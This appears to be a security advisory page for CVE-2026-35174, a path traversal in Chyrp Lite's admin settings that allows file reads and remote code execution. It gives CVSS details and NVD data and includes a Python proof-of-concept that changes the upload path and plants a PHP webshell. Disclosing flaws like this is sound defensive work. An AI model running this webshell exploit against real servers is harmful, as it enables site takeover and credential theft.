Security Vulnerability Report
CVE-2026-35174 CVSS 9.1 CRITICAL

Published: 2026-04-06 18:16:44
Last Modified: 2026-04-14 15:37:14

Description

Chyrp Lite is an ultra-lightweight blogging engine. Prior to 2026.01, a path traversal vulnerability exists in the administration console that allows an administrator, or a user with the Change Settings permission, to change the uploads path to any folder. This lets that user download any file on the server, including config.json.php with the database credentials, and overwrite critical system files, leading to remote code execution. The vulnerability is fixed in 2026.01.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:chyrplite:chyrp_lite:*:*:*:*:*:*:*:* - VULNERABLE
Chyrp Lite < 2026.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target.com"
login_url = f"{target_url}/admin/login"
settings_url = f"{target_url}/admin/settings"
upload_url = f"{target_url}/admin/upload"

session = requests.Session()

# Step 1: Authenticate as Admin
# Attacker needs valid credentials or a session with 'Change Settings' permission
credentials = {'username': 'admin', 'password': 'password'}
session.post(login_url, data=credentials)

# Step 2: Exploit Path Traversal via Settings
# Change the upload path to a sensitive directory using traversal sequences
payload = {
    'upload_path': '../../'  # Moves upload dir to parent (could be root or web root)
}
session.post(settings_url, data=payload)

# Step 3: Upload Malicious File
# The application will now save the file in the traversed directory
# Overwriting a critical file (e.g., .htaccess, index.php) or creating a webshell
webshell_content = '<?php system($_GET["cmd"]); ?>'
files = {'file': ('shell.php', webshell_content, 'application/x-php')}
upload_response = session.post(upload_url, files=files)

if upload_response.status_code == 200:
    print("[+] File uploaded. Attempting to access webshell...")
    # Step 4: Trigger Remote Code Execution
    shell_url = f"{target_url}/shell.php?cmd=whoami"
    r = session.get(shell_url)
    print(f"[+] RCE Response: {r.text}")
else:
    print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35174", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:43.677", "lastModified": "2026-04-14T15:37:14.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chyrp Lite is an ultra-lightweight blogging engine. Prior to 2026.01, a path traversal vulnerability exists in the administration console that allows an administrator or a user with Change Settings permission to change the uploads path to any folder. This vulnerability allows the user to download any file on the server, including config.json.php with database credentials and overwrite critical system files, leading to remote code execution. This vulnerability is fixed in 2026.01."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": 
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chyrplite:chyrp_lite:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.01", "matchCriteriaId": "A06975FD-D52C-42B2-8842-7626FCA5A94E"}]}]}], "references": [{"url": "https://github.com/xenocrat/chyrp-lite/security/advisories/GHSA-p6pf-2grm-8257", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}